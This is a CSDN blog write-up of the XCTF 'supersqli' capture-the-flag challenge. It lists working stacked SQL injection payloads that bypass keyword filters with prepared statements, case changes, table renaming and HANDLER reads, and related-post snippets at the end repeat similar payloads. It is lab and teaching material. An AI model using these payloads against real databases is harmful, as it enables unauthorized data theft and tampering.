攻防世界 supersqli

最新推荐文章于 2024-10-15 20:11:01 发布
最新推荐文章于 2024-10-15 20:11:01 发布
阅读量1.2k 收藏 18
点赞数 28
分类专栏: # 攻防世界 文章标签: web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/beiweixiaotian66/article/details/142000932
版权

supersqli

一般sql语句的题都是先判断,经过测试,是单引号注入

999' union select database(),2#

img

可以发现很多关键字都被过滤了select,所以联合查询,报错注入,布尔和时间盲注都不能用了,可以想到堆叠注入。

1';show databases;#

img

1'; show tables;#

img

1';show columns from `19198109311145`;#

纯数字的表需要加上引号

img

然后我们要知道如何拿到这个列中的flag的数据

我记得之前我是做过的,还是卡在了这里QAQ

攻防世界(六)supersqli - HUGBOY - 博客园 (cnblogs.com)

法1 预编译

预编译的语句是什么?

通常一条sql在db接收到并且最终执行完成可以分为以下三个部分:

  1. 语义和词法的解析
  2. 优化sql语句,制定执行计划
  3. 执行并且返回结果

我们将这种语句称为Immediate Statements

但是很多情况,我们的一条sql语句可能会被反复执行,或者每次执行的时候只有个别的值是不同的(比如query的where字句值不同,update的set子句,insert的value值),如果每次都需要经过上面的词法语义解析、语句优化、制定执行计划等,则效率就明显不行了。

所谓预编译语句就是将这类语句中的值用占位符替代,可以视为将sql语句模板化或者说参数化,一般称这类语句叫Prepared Statements或者Parameterized Statements预编译语句的优势在于归纳为:**一次编译、多次运行,省去了解析优化等过程;此外预编译语句能防止sql注入。**当然就优化来说,很多时候最优的执行计划不是光靠知道sql语句的模板就能决定了,往往就是需要通过具体值来预估出成本代价

MySQL的预编译功能

注意MySQL的老版本(4.1之前)是不支持服务端预编译的,但基于目前业界生产环境普遍情况,基本可以认为MySQL支持服务端预编译。

下面我们来看一下MySQL中预编译语句的使用。
首先我们有一张测试表t,结构如下所示:

mysql> show create table t\G
*************************** 1. row ***************************
       Table: t
Create Table: CREATE TABLE `t` (
  `a` int(11) DEFAULT NULL,
  `b` varchar(20) DEFAULT NULL,
  UNIQUE KEY `ab` (`a`,`b`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8
1 row in set (0.00 sec)

3.1 编译

我们接下来通过 PREPARE stmt_name FROM preparable_stm的语法来预编译一条sql语句

mysql> prepare ins from 'insert into t select ?,?';
Query OK, 0 rows affected (0.00 sec)
Statement prepared

3.2 执行

我们通过EXECUTE stmt_name [USING @var_name [, @var_name] ...]的语法来执行预编译语句

mysql> set @a=999,@b='hello';
Query OK, 0 rows affected (0.00 sec)

mysql> execute ins using @a,@b;
Query OK, 1 row affected (0.01 sec)
Records: 1  Duplicates: 0  Warnings: 0

mysql> select * from t;
+------+-------+
| a    | b     |
+------+-------+
|  999 | hello |
+------+-------+
1 row in set (0.00 sec)

可以看到,数据已经被成功插入表中。

MySQL中的预编译语句作用域是session级,但我们可以通过max_prepared_stmt_count变量来控制全局最大的存储的预编译语句。

mysql> set @@global.max_prepared_stmt_count=1;
Query OK, 0 rows affected (0.00 sec)

mysql> prepare sel from 'select * from t';
ERROR 1461 (42000): Can't create more than max_prepared_stmt_count statements (current value: 1)

当预编译条数已经达到阈值时可以看到MySQL会报如上所示的错误。

3.3 释放

如果我们想要释放一条预编译语句,则可以使用{DEALLOCATE | DROP} PREPARE stmt_name的语法进行操作:

mysql> deallocate prepare ins;
Query OK, 0 rows affected (0.00 sec)

okk,现在我们要执行的是

select * from `1919810931114514`;

预编译的语法:

set 用于设置变量和值
prepare 用于预备一个语句,并赋予名称,以后可以引用到该语句
execute 执行语句
deallocate prepare 用来释放掉预处理的语句
-1';set @sql = CONCAT('se','lect * from `1919810931114514`;');prepare stmt from @sql;EXECUTE stmt;#

拆分开来如下
-1';
set @sql = CONCAT('se','lect * from `1919810931114514`;');
prepare stmt from @sql;
EXECUTE stmt;
#

发现弹出来了

img

这里是用strstr检测到了setprepare关键字,但是strstr这个函数并不能区分大小写,所以可以用大小写将其绕过

-1';
Set @sql = CONCAT('se','lect * from `1919810931114514`;');
Prepare stmt from @sql;
EXECUTE stmt;

法二 更改表名和列名

1';show columns from words;

img

words表中有两个字段 id 、data。其中id为整形int(10)、data为字符型varchar(100),而数字表中只有一个字段

后台的查询语可能是:

select * from words where id=

所以我们可以将表1919810931114514名字改成words,将flag列的名字改成id或者data,就可以得到flag的内容了

words名改为word123     alter table words rename to words123;

把数字表名改为 words   alter table `1919810931114514` rename to words;

现在的words表中没有id字段,我们把flag字段名改为id     alter table words change flag id varchar(100);

构造的语句为

1'; alter table words rename to words123;alter table `1919810931114514` rename to words;alter table words change flag id varchar(100);#

最后还要

1' or 1=1#

法三 handler语句代替select查询

handler的用法

handler users open as yunensec; #指定数据表进行载入并将返回句柄重命名
handler yunensec read first; #读取指定表/句柄的首行数据
handler yunensec read next; #读取指定表/句柄的下一行数据
handler yunensec read next; #读取指定表/句柄的下一行数据
...
handler yunensec close; #关闭句柄

所以

1';
handler `1919810931114514` open as cyan;
handler cyan read first;
handler cyan close;#

最后

1' or 1=1#

image-20240907192952272

Cyan1u
关注
专栏目录
【网络安全 | CTF】攻防世界 supersqli 解题详析
等风来
05-27 3639
堆叠注入(stacked injection)是一种SQL注入攻击的技术手段,它会在同一行代码中多次使用已知的SQL注入漏洞,从而达到绕过安全措施、执行恶意代码和窃取数据库信息等目的。堆叠注入攻击利用了SQL语句的连贯性,通过在查询语句中嵌入多个SELECT语句或在UPDATE语句中嵌入多个SET赋值的情况来强行插入额外的恶意代码段。表示注释掉其后面的内容,因此程序会执行两次SQL语句,并忽略掉密码的条件,最终返回敏感数据的行数,从而达到了窃取数据库敏感信息的目的。断开原有语句,再插入新的SQL语句。
攻防世界(web篇)---supersqli
飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘
06-09 827
一开始就是查询word表中的数据,所以我们可以利用数据库修改表名和列名的方法先把原来的words表名字改成别的,再将1919810931114514表的名字改为words再将改完名字后的表中的flag字段改为 id (id同样需要show columns from word得到)然后我们用1’ or 1=1 --+直接就能得到flag...
supersqli_攻防世界
u014794949
10-23 432
进入题目发现是文本框提交,通过尝试确定闭合字符和注入点 order by确定存在2个字段 1' order by 2# union select查询发现关键字过滤 通过堆叠注入得到库名 1';show databases;# 尝试得到表名 1';show tables;# 尝试得到两表中的列名 1';show columns from `1919810931114514`;# 1';show columns from `words`;# flag列中比较可能存放答案,words表里
supersqli-攻防世界
szhangliwenya的博客
03-30 2282
因为 H 对应 ASCII 码值为 72,e 对应 ASCII 码值为 101,l 对应 ASCII 码值为 108,o 对应 ASCII 码值为 111。根据提交方式:POST注入,GET注入,HTTP HEAD注入。根据有无回显:联合注入,报错注入,布尔盲注,延时注入。1' and 1=1 #没报错判断为单引号字符注入。其他注入:堆叠注入,宽字节注入,二次注入等。1' order by 3#报错。
攻防世界22-supersqli-CTFWeb
最新发布
LH1013886337的博客
10-15 182
sql注入,提交1,查询得到信息,看看是否存在注入点发现return preg_match(“/select|update|delete|drop|insert|where|./i”,$inject);存在过滤,这题有多种方法,涨知识字符串为表名操作时要加反引号。
supersqli 攻防世界
qq_53030229的博客
11-22 462
文章目录一、知识拓展1、我在mi数据库中创建了一个数据表2、使用handler读取数据二、堆叠注入1、查找注入点2、查看数据库、数据表3、查看表的内容 一、知识拓展 mysql除可使用select查询表中的数据,也可使用handler语句,这条语句使我们能够一行一行的浏览一个表中的数据 1、我在mi数据库中创建了一个数据表 2、使用handler读取数据 总结下来就四条命令,不难,你们自己尝试动手一下,加深印象,handler打开后要关闭,没有关闭下次打不开 HANDLER mi open; 打开mi表
攻防世界——supersqli
weixin_62281892的博客
09-18 1881
PHP preg_replace() 正则替换,与Javascript 正则替换不同,PHP preg_replace() 默认就是替换所有符号匹配条件的元素。到这里我们的表列名就已经修改完毕,此时还会输出修改完成的words列名,最后通过万能钥匙1' or '1'='1即可得到输出。由于注入框的查询是对列id的搜索,此时参考两个表的列名,需要将flag列名改为能够查找的id列(修改包括名称和数据类型)。上网冲浪了解了一波,好像是类似黑名单,这些词会被替换,那没办法了,我们就用堆叠注入。
攻防世界supersqli
weixin_52268949的博客
02-09 699
supersqli 补充知识点 rename 命令格式: rename table 原表名 to 新表名 例如,在表myclass名字更改为youclass: mysql>rename table myclass to youclass; alter和change,使用change子句,语法有很大的不同。在change关键字之后,紧跟着的是你要修改的字段名,然后指定新字段名及类型,例子 mysql> alter table testalter_tbl change i j int 补充完成了这
攻防世界 supersqli writeup
12-14
发现有注入,注入点为injiect=2’,接下来–dbs尝试查询数据库,只爆出supersqli,但无法爆出表。 回到题目 order by 判断只有两个字段(别人的writerup说–+被过滤,只能使用#,不知道为什么没有,最后发现是在查询...
攻防世界 supersqli 解题思路
xj28555的博客
07-14 1554
随便注,初步判断是有注入点的,那我们进入题目 提交一个1试一试 再在1的后面加个单引号试一试 报错了,然后我们判断有几个字段。 回车后正常,但是换成3后就报错了,所以有两个字段。 当我想用联合查询查询用户和数据库的时候 爆出一段正则表达式,发现过滤掉了图中的关键字。然后我寻找绕过点,发现了堆叠注入。 查询表 查询字段 发现flag,然后我们想办法读取flag值。因为select被正则表达式给过滤掉了,所以这里我们就要想一点骚姿势了。刚开始我想..
攻防世界-supersqli
m0_63563528的博客
03-28 561
题目来源:强网杯 参考资料:金帛师傅的http://t.csdn.cn/KmxUY
攻防世界——supersqli进阶
qq_62046696的博客
05-04 1588
关于sqil的题目,这个真的是知识面太杂了。我研究了好几天,才看懂了这个题解。 打开场景以后,发现的是一个文本框,然后试一下有没有sql注入 先输入1发现回显正常,然后输入1‘发现出现错误,然后就可以判断存在sql注入 然后判断一下有几列,进行 1' order by 2#回显正常,但是1' order by 3#回显错误,所以可以确定一共有2列 发现select被禁用 然后就想到运用推叠注入, 想到首先查询一下数据库,然后发现supersqli这个就是要找的数据库 然后进行查表操作, ..
攻防世界XCTF:supersqli
末初的CSDN博客
03-13 2399
加个单引号发现报错 比较烦的就是过滤了select 这样就无法进行查数据了,而且这里的/i就是忽略了大小写。无法进行大小写过滤 首先可以通过报错函数,把数据库给注入出来 -1' and extractvalue(1,concat(1,version()))-- + 版本信息:.18-MariaDB 数据库名称:supersqli 然后经过测试发现这里可以执行多条语句,也就是堆叠注入...
攻防世界 supersqli(堆叠注入)
m0_56107268的博客
05-04 1834
1.首先判断有无注入点: 1’ and 1=1 # 1' and 1=2 # 2.进行注入 判断字段数 1' order by 2 # //两个字段 判断字段注入点 1' union select 1,2 # 出现一个正则替换 查看其他人博客,发现是使用堆叠注入 堆叠注入原理? mysql数据库sql语句的默认结束符是以";"号结尾,在执行多条sql语句时就要使用结束符隔 开,而堆叠注入其实就是通过结束符来执行多条sql语句 堆叠注入触发条件 堆叠注入触发的条件很
攻防世界supersqli(堆叠注入)
2302_79800344的博客
04-09 1069
进入题目环境,有输入框与注入参数,推测类型为SQL注入:测试--注入类型为数字型还是字符型,构造payload:?inject=1 or 1=2 并提交: 发现页面依然正常,说明注入类型为字符型,则继续检查闭合方式,首先尝试单引号闭合,构造payload: ?inject=1' --+证实了闭合方式为单引号,继续测试字段数目(order by / group by ),经测试,字段数目为2。接着开始注数据库名,表名等关键信息:首先尝试Union联合注入---构造payload: ?inject=1' uni
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值